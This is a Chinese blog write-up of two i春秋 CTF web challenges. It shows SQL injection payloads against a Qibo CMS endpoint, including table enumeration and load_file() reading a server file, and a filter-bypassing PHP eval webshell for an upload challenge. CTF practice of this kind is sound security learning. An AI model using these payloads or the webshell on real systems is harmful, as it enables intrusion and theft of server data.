今天花了点时间刷了下题目，遇到几道相对来说进阶的题目，学习一下储备一些CTF思路，这些题。。脑洞有点开。

再见CMS

总结

Upload

绕过方法

总结

再见CMS

昨天刚做一道

[WEB攻防] i春秋- “百度杯”CTF比赛十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入复现过程_AAAAAAAAAAAA66的博客-CSDN博客

今天继续按着套路来

直接在线CMS指纹识别

百度找到payload ，都是些过了很久的漏洞了

这里简单知道是一个注入漏洞就行了，我们的目的是照着payload修改找flag

POC

简单构造一下，
向http://localhost/qibov7/member/userinfo.php?job=edit&step=2
发送数据包：truename=xxxx%0000&Limitword[000]=&email=123@qq.com&provinceid=,
address=(select user()) where uid=38%23

需要修改的emali=123@qq.com 和 uid=38

其中emali 是我们注册时用的邮箱

uid：点击我们个人主页，uid可以看到

下面到了自己动手的地方了(使用HACKBAR)

url

http://2ee06f40f1b54ce6acda4e66b31973067b028d2008ca40d9.changame.ichunqiu.com/member/homepage.php/member/userinfo.php?job=edit&step=2

post

truename=xxxx%0000&Limitword[000]=&email=111@qq.com&provinceid= , address=(select version()) where uid = 3 %23

可以看到这里报错注入显示了服务器版本，所以到这我们就复现成功了

接下来爆表（利用where table_schema=database()不用爆库）


truename=xxxx%0000&Limitword[000]=&email=111@qq.com&provinceid= , address=(select group_concat(table_name) from information_schema.tables where table_schema=database()) where uid = 3 %23

太多表了，一个一个查太麻烦了。（这里面没flag）有一个提示

用dirsearch-master

那么就想办法用注入获取flag.php了

这里就要用到load_file函数了

MYSQL注入中load_file()函数的进一步应用_收集盒 Book box-CSDN博客

用16进制代表/var/www/html/flag.php

0x2f7661722f7777772f68746d6c2f666c61672e706870

最终payload

truename=111&Limitword[000]=&email=111@qq.com&provinceid=
, address=(select load_file(0x2f7661722f7777772f68746d6c2f666c61672e706870) ) where uid = 3 %23

最后在个人主页查看源码

搜索flag

总结

抓住了一个点就不要放，既然存在注入就一定要用注入获取到flag，如果获取不到，再去搜索其他的信息，最终一定要与注入结合，才能获取flag，不可能出题人引导你找到了一个漏洞却不让你用。

Upload

简单上传个一句话

点击上传成功看路径，没路径是没办法用蚁剑连接的。

绕过方法

上面我们分析，过滤了 <? php 这2个字符。怎么绕过呢？

php长标签 <script language="php"> 绕过<?
但是php 我们尝试大小写绕过 pHp

最终payload

<script language="pHp">@eval($_POST['xxx'])</script>

上传，蚁剑连接。

顺便也能在index.php看见了过滤的代码

<?phpif (is_uploaded_file($_FILES["file"]["tmp_name"])):$file = $_FILES['file'];$name = $file['name'];if (preg_match("/^[a-zA-Z0-9]+\\.[a-zA-Z0-9]+$/", $name) ):$data = file_get_contents($file['tmp_name']);while($next = preg_replace("/<\\?/", "", $data)){$next = preg_replace("/php/", "", $next);if($data === $next) break;$data = $next;}file_put_contents(dirname(__FILE__) . '/u/' . $name, $data);chmod(dirname(__FILE__) . '/u/' . $name, 0644);
?>

总结

这道题可以随便上传任意文件，但是对必要的一些php文件内容进行过滤，但是它给出了过滤的结果，想办法绕过过滤即可。

参考链接

[百度杯]九月场再见CMS writeup_Flyour的博客-CSDN博客_再见cms

MYSQL注入中load_file()函数的进一步应用_收集盒 Book box-CSDN博客

“百度杯”CTF比赛九月场——Web-Upload_Ifish的博客-CSDN博客

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现相关推荐

2017 百度杯丶二月场第一周WP
1.祸起北荒题目: 亿万年前天子之子华夜,被父神之神末渊上神告知六荒十海之北荒西二旗即将发生一场"百度杯"的诸神之战他作为天族的太子必须参与到此次诸神之战定六荒十海华夜临危 ...
i春秋百度杯CTF比赛2016年12月场writeup
第一场传说中的签到题·进阶篇题目: 没那么简单~ 11101100101000110011111011000 tips1:big num tips2: 496265176 二进制转十进制刚好和提示 ...
【wp】i春秋百度杯CTF比赛2016年12月场writeup
|@第一场 |-----@传说中的签到题·进阶篇 |-----@福尔摩斯 |-----@+ -- + |@第二场 |-----@一个十六岁的少年 |-----@藏在邮件头里的秘密 |-----@吃货 ...
“百度杯”CTF比赛2017年2月场WP--web
一.爆破-1 在php语言中,所有的已经定义的变量都会保存在GLOBALS全局数组中,比方说你定义了一个$name="李华",那么$GLOBALS['name']就等于" ...
第一届“百度杯”信息安全攻防总决赛
第一届"百度杯"信息安全攻防总决赛(3月15-3月26) 比赛通道: 第一届"百度杯"信息安全攻防总决赛比赛通道百度杯已经陪伴大家度过了七个月, 共计23场比 ...
[WEB攻防] i春秋- “百度杯”CTF比赛十二月场-YeserCMS cmseasy CmsEasy_5.6_20151009 无限制报错注入复现过程
中华人民共和国网络安全法(出版物)_360百科可以说一道经典的CTF题目,解这道题的过程类似于我们渗透测试的过程,所以把它放在了这个专栏,在这里我们详细讲过程,而不是原理. 目录题目寻找方向 f ...
[i春秋]“百度杯”CTF比赛十月场-Hash
前言涉及知识点:反序列化.代码执行.命令执行题目来自:i春秋 hash 如果i春秋题目有问题可以登录榆林学院信息安全协会CTF平台使用或者利用本文章提供的源码自主复现 [i春秋]"百 ...
百度杯CTF Write up集锦 WEB篇
九月场 1.code 一开始的URL为 http://ace3c302efed4a9094cbac1dff0250e8add1b4b45f8249d4.game.ichunqiu.com/index. ...
“百度杯”CTF比赛 2017 二月场 wp
目录爆破-1 爆破-2 爆破-3 include Zone OneThink misc 2 上古神器爆破-1 flag在一个长度为6的变量里面 <?php include "fla ...

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现

再见CMS

总结

Upload

绕过方法

总结

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现相关推荐

最新文章

热门文章

i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现

再见CMS

总结

Upload

绕过方法

总结

i 春秋CTF题目 百度杯 9月场 再见CMS Upload 复现相关推荐

最新文章

热门文章

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现

i 春秋CTF题目百度杯 9月场再见CMS Upload 复现相关推荐